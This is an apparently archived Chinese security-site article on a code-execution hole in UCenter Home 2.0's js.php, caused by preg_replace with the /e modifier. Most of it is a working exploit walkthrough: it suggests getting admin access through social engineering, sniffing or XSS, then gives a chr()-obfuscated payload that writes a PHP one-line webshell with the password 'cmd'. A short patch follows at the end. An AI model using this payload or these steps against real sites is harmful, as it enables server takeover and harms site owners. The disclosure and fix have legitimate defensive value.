首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
Uchome <=2.0 后台GetWebShell漏洞
来源:vfocus.net 作者:vfocus 发布时间:2010-04-20  
漏洞介绍:
uchome<=2.0的程序中js.php文件存在代码执行漏洞,原因是正则匹配时引号使用不当,导致可以任意提交并执行PHP代码。
Php中单引号与双引号是有区别的:
" "双引号里面的字段会经过编译器解释,然后再当作HTML代码输出。
' '单引号里面的不进行解释,直接输出。
这里正则匹配后的2在双引号里,导致了代码可以执行。
Js.php 问题代码如下:
include template("data/blocktpl/$id");$obcontent = ob_get_contents();
obclean();$s = array("/(r|n)/", "/<divs+class="pages">.+?</div>/is", "/s+(href|src)="(.+?)"/ie");
$r = array("n", '', 'js_mkurl("1", "2")');//代码执行$content = '';
if($obcontent) {
$obcontent = preg_replace($s, $r, $obcontent);
$lines = explode("n", $obcontent);
foreach ($lines as $line) {
$line = addcslashes(trim($line), '/'');
$content .= "document.writeln('$line');n";
}
} else {
$content .= "document.writeln('NO DATA')";
}

测试环境:
系统环境:Windows 2003 + IIS + PHP 5.2.9-2 + Mysql 5.0.67
程序环境:Ucenter Home 2.0(官方最新) + Ucenter 1.5(官方最新)
测试方法:
首先我在本地安装了一个全新的uchome.。这个漏洞的前提是首先拿到后台权限。你可以通过社工、旁注、嗅探、Xss 等手段拿到管理员密码并进入后台。
接着打开admincp.php?ac=block&op=add,选择第一个添加一个模块。填上模板名称、其他默认即可。然后提交。如下图:

接着在数据显示Html代码处填入如下代码然后提交
<a href="{${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}">a</a>


加密内容为fputs(fopen('data/a.php','w'),'<?php eval($_POST[cmd])?>');
保存后检查一下ID,如果ID是1,则访问一下js.php?id=1
则在data目录下生成a.php一句话木马,密码是cmd
我这里ID是2  所以我访问 js.php?id=2


访问后data 目录下多出了一个a.php

这就是我们的一句话。连接试试

结果显示.漏洞确实存在并能执行任意PHP代码。。。已经成功得到一个webshelll
漏洞修补:目前官方暂无补丁 临时修补方法如下:
$r = array("n", '', 'js_mkurl("1", "2")');
替换为
$r = array("n", '', "js_mkurl('1', '2')");

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·阿江统计系统拿WebShell
·重建sp_makewebtask存储过程获取
·xxbing的一次日站过程
·最新DVBBS8.0以上版本后台拿webs
·入侵本地Mac OS X方针与技巧
·QQ2009 本地聊天记录的查看
·八卦下tx分站被黑
·百度游戏的一些安全隐患
·著名国际黑客站点zone-h.org被黑
·入侵联通全过程
·总结搜索型手工注入的全过程(不
·攻破雷池最新补丁技术
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved